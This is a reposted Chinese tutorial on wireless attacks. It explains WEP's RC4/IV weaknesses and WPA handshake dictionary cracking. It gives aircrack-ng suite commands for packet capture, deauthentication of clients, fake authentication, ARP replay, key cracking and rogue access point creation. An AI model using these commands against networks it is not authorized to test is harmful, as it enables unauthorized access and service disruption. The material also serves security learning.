ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

无线攻击

2020-01-15 18:01:34  阅读:584  来源: 互联网

标签:密钥流 攻击 wlan0mon IV AP MAC ng 无线


1、WEP攻击

wep是共享密钥的wlan加密方式,这种加密机制及密码算法上面是存在先天的漏洞和问题的;比较容易破解,安全性不高,简直就可以说彻底不安全!现在几乎已经被WPA的加密方式取代。但还是了解一下啊

使用RC4对称加密算法(加解密用一个密钥)加密流量内容、CRC32算法检查数据的完整性。

标准采用使用24位initialization vector(IV起始向量)

  • 加密:对明文流和密钥流记性XOR(二进制异或)计算
  • 解密:对密文流和密钥流进行XOR计算

 

 RC4算法加密流程:

 

 24位IV值随机数+无线密码结合利用KSA算法生成一个初始的状态表、再通过PRGA算法生成一个密钥流;数据流是由数据和完整校验算法CRC32生成ICV(起始check value),数据流与密钥流一位对一位,然后异或运算生成密文消息 ,加上IV和keyid 包头信息。

RC4解密流程:

 

 从包中直接拿到IV值,根据key id提取key内容组合用KSA和PRDA算法生成密钥流,再和密文流取异或生成原数据,再生成CRC32校验。

wep共享密钥破解

  • IV并非完全随机
  • 每224个包可能会出现一次IV重用
  • 收集大量IV之后找出相同IV及其对应密文,比对分析得出共享密码

因为ARP回包中包含IV,所以IV足够多的情况下,任何复杂程度的wep密码都可以被破解

监听抓到加密前的明文chellege和这个明文加密后的密文 ,有这两个东西就可以进行二进制亦或计算,得到密钥流(xor),当然这个密钥流是以密文存在,有这个就可以与AP建立关联。

只有建立关联才能进行收集ARP注入。

-攻击:

-抓包--

airodump-ng -c 11 --bssid AP_MAC wlan0mon -w CMCC-free
抓的IVZ值在#date显示

--主动抓包:打断--

假如都已连接无新的连接,就打断现有连接(Deauthentication),重连时窃取
aireplay -0 10 -a AP_MAC -c Client_MAC wlan0mon

-0:Deauthentication
10:打断数目
每攻击发送128个包,64个给AP,64个给客户端 --伪造身份认证进行关联-- areplay-ng -1 60 -e CMCC-FREE -y wep-01-EC-ER-FF-2E-3F.xor -a EC:DE:23:4R:5T:12 -h 1Q:2W:3E:4R:4T:1D wlan0mon -1:第一种攻击方式 60:是每60秒攻击一次 -e:目标AP -y:密钥流(用以产生关联) -a:AP的MAC地址 -h:黑客的mac地址 --执行ARP重放-- aireplay-ng -3 -b AP_MAC -h hacker_mac wlan0mon 此处也可打断,出arp 要等#Date至少10万20万 (大概10分钟),一边抓一遍分析尝试破解
64bit密钥:25万
128bit密钥:150万 --尝试解密-- aircrack-ng CMCC-FREE-01.cap 很快就得到结果~

注意事项:

WPA\WPA2 不支持 Fake authentication

 二、WPA攻击

 只有一种密码破解的方法:wpa不存在wep的弱点

  • CPU\GPU资源
  • 时间
  • 字典质量
    • 网上共享的
    • 泄露密码
    • 区号、手机号段、生日、百家姓、名人
    • 工具自制字典

PSK破解过程

  1. 启动monitor
  2. 开始抓包并保存
  3. Deauthentication 攻击获取4步握手信息
  4. 使用字典暴力破解
 #抓包
airodump-ng -c 11 --bssid AP_MAC wlan0mon -w CMCC-free

#打断重连
aireplay -0 2 -a AP_MAC -c Client_MAC wlan0mon

#跑包
aircrack-ng -w /user/share/wordlists/zidian.txt CMCC-free.cap

 

 重中之中-关键就是跑包就是看字典强不强大~

几种其他字典破解工具自行参考:

  • airolib
  • JTR
  • cowpatty
  • pyrit

还可以拷贝到WINDOWS下使用EWSA:

传送门:软件云盘链接:https://pan.baidu.com/s/1_If_fkefIIVzfncLP5kU8Q
提取码:u7hg

 

 

 还有一种攻击场景是【无AP情况下的WPA密码破解】

 

 伪造一个AP,  pmk=essid+PSK,只用4步握手中的前两步就行!

有些鸡肋,还要跟踪人家到真实的物理环境去。

airbase-ng 可用你的无线网卡创造一个AP出来



airbase-ng --essid KFC -c 11 wlan0mon       #open

airbase-ng --essid KFC -c 11 -w key wlan0mon     #wep
airbase-ng --essid KFC -c 11 -z 2 wlan0mon       #wpa1
airbase-ng --essid KFC -c 11 -Z 4 wlan0mon    #wpa2

这样会在你的系统生成一个at0的网卡

 

 

 

 

 

123

标签:密钥流,攻击,wlan0mon,IV,AP,MAC,ng,无线
来源: https://www.cnblogs.com/ethtool/p/12195377.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有